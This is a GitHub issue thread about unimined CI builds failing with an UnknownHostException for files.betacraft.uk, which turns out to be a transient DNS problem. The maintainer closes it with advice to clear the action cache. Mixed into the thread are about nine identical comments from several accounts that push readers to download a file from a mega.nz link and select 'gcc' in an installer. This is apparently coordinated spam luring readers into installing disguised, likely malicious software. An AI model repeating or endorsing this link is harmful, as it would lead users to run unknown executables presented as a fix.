### ISSUE TITLE
java.net.UnknownHostException: files.betacraft.uk in CI builds

### ISSUE THREAD

**Issue by 3arthqu4ke** [unimined/unimined#98]
Locally everything seems to work, but since last night all of my CI builds fail with `java.net.UnknownHostException: files.betacraft.uk`.
Is it possible that they blocked github?

```
Caused by: java.net.UnknownHostException: files.betacraft.uk
	at xyz.wagyourtail.unimined.internal.minecraft.MinecraftProvider.provideRunClientTask(MinecraftProvider.kt:731)
	at xyz.wagyourtail.unimined.internal.minecraft.MinecraftProvider.applyRunConfigs(MinecraftProvider.kt:449)
	at xyz.wagyourtail.unimined.internal.minecraft.MinecraftProvider.apply(MinecraftProvider.kt:588)
	at xyz.wagyourtail.unimined.UniminedExtensionImpl.minecraft(UniminedExtensionImpl.kt:43)
```

I have set up a workflow in unimined to show this behaviour: 
https://github.com/3arthqu4ke/unimined/blob/main/.github/workflows/build-one-project.yml

And here the run:
https://github.com/3arthqu4ke/unimined/actions/runs/10545741572/job/29216353755

I have made the runs.off also not apply the runConfigs and turned off the runs:
https://github.com/3arthqu4ke/unimined/commit/222d1d9259be8e2b25e394ecba673184fb6f6c87
And with that it works on the CI:
https://github.com/3arthqu4ke/unimined/actions/runs/10545746102/job/29216363371

I am sorry if I was the reason for this...
I have three projects ([hmc-specifics](https://github.com/3arthqu4ke/hmc-specifics), [mc-runtime-test](https://github.com/3arthqu4ke/mc-runtime-test) and [hmc-optimizations](https://github.com/3arthqu4ke/hmc-optimizations)), which all come with large workflows spanning like 20 minecraft versions, so that might have generated some traffic for them?
I'll see if I can do something with caching, for now I am switching to my unimined fork where I have turned runs off.
But I am also almost there switching these projects in maintenance mode, so these workflows might not run that much in the future.

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by 3arthqu4ke** [comment]
https://github.com/3arthqu4ke/baritone/actions/runs/10545587475/job/29216002900

baritone is also affected

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by darkstorm4hack** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by Zoraaa-z** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by 3arthqu4ke** [comment]
odd, sorry for alerting so quickly. The workflows I linked seem to work again.
It must have been an issue with the DNS Github uses, because I dialed files.betacraft.uk on my machine immediately after the workflows failed and it worked.

Github Runners in general seem to have been weird today.
After they stopped failing on files.betacraft.uk I often got compilation errors with Minecraft and Forge classes not being found on workflows that worked perfectly fine yesterday. 

Github Status looks fine and they have nothing in their incident history yet.

Actually this one is still failing:
https://github.com/3arthqu4ke/hmc-specifics/actions/runs/10545300571/job/29223215831
Does not find any Minecraft classes, and has worked perfectly fine until yesterday, no code changes, I just reran it to see if it still works when the UnknownHostExceptions occurred. But its still on unimined 1.1.1 and an older Minecraft version so who knows what the issue is.

**Comment by wagyourtail** [comment]
ok. I guess I'll close this then since it cleared itself up, I believe I've also made runs not configure on CI in the develop branch so this won't occur in the future. as for that issue, you could try clearing the action cache

**Comment by 3arthqu4ke** [comment]
> ok. I guess I'll close this then since it cleared itself up, I believe I've also made runs not configure on CI in the develop branch so this won't occur in the future. as for that issue, you could try clearing the action cache

Thanks that might have worked!
